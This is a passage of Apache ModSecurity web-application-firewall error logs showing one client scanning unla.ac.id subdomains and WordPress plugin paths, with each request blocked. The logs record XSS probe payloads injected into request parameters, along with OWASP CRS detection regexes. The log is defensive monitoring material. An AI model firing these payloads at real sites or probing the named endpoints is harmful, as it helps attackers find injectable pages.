"/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAAolKZkAAAAe"]
[Tue Aug 29 11:53:47.157203 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAApJDTgAAAAY"]
[Tue Aug 29 11:53:47.772828 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAAoGFfUAAAAE"]
[Tue Aug 29 11:53:47.774991 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO1528Co-f0AAApHRWQAAAAP"]
[Tue Aug 29 11:53:47.837222 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO1528Co-f0AAAoGFfYAAAAE"]
[Tue Aug 29 11:53:48.004249 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO153MCo-f0AAAoGFfcAAAAE"]
[Tue Aug 29 11:53:48.067548 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO153MCo-f0AAAoW7UwAAAAJ"]
[Tue Aug 29 11:53:48.071869 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO153MCo-f0AAAoPueIAAAAM"]
[Tue Aug 29 11:53:48.167491 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO153MCo-f0AAAox7KAAAAAN"]
[Tue Aug 29 11:53:48.700127 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO153MCo-f0AAAo2m7MAAAAA"]
[Tue Aug 29 11:53:50.836600 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAAoPuekAAAAM"]
[Tue Aug 29 11:53:50.865355 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAAoqbWwAAAAj"]
[Tue Aug 29 11:53:50.871707 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAAox7LAAAAAN"]
[Tue Aug 29 11:53:50.938513 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAApLWkQAAAAI"]
[Tue Aug 29 11:53:51.048535 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO1538Co-f0AAApPcuIAAAAa"]
[Tue Aug 29 11:53:51.094975 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO1538Co-f0AAApPcuMAAAAa"]
[Tue Aug 29 11:53:51.679888 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAAolKa4AAAAe"]
[Tue Aug 29 11:53:51.692983 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: =1 onerror= found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/product.php"] [unique_id "ZO1538Co-f0AAApJDUgAAAAY"]
[Tue Aug 29 11:53:51.708351 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAAowNtIAAAAH"]
[Tue Aug 29 11:53:51.708440 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAAolKa8AAAAe"]
[Tue Aug 29 11:53:51.713394 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAAox7LQAAAAN"]
[Tue Aug 29 11:53:51.735406 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAApOdbgAAAAL"]
[Tue Aug 29 11:53:52.799741 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154MCo-f0AAApOdbkAAAAL"]
[Tue Aug 29 11:53:52.799858 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154MCo-f0AAAoqbXEAAAAj"]
[Tue Aug 29 11:53:52.804468 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154MCo-f0AAAofm@oAAAAX"]
[Tue Aug 29 11:53:52.812920 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154MCo-f0AAAowNtMAAAAH"]
[Tue Aug 29 11:53:52.887668 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154MCo-f0AAAofm@sAAAAX"]
[Tue Aug 29 11:53:52.888666 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: =1 onerror= found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154MCo-f0AAAoqbXIAAAAj"]
